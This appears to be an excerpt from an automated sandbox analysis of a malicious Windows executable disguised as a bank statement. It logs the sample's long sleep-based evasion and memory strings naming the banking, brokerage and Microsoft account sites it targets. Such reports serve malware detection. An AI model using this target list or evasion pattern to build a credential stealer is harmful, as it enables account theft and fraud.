Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 595998	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 595887	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 595608	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 595499	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 595389	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 594624	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 594515	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 594404	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 594297	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 594187	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 594075	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 593968	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 593859	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 593750	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6404	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3304	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Window / User API: threadDelayed 2098	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Window / User API: threadDelayed 7742	Jump to behavior

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 6768	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -35048813740048126s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7264	Thread sleep count: 2098 > 30	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7264	Thread sleep count: 7742 > 30	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -599759s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -599639s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -599484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -599373s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -599185s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -599077s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -598796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -598587s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -598336s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -598230s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -597890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -597781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -597672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -597562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -597453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -597343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -597234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -597125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -597015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -596906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -596797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -596687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -596562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -596453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -596343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -596234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -596125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -595998s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -595887s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -595718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -595608s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -595499s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -595389s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -595281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -595172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -595062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -594953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -594843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -594734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -594624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -594515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -594404s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -594297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -594187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -594075s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -593968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -593859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260	Thread sleep time: -593750s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 599759	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 599639	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 599373	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 599185	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 599077	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 598587	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 598336	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 598230	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 595998	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 595887	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 595608	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 595499	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 595389	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 594624	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 594515	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 594404	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 594297	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 594187	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 594075	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 593968	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 593859	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Thread delayed: delay time: 593750	Jump to behavior

Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4609654025.0000000001103000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
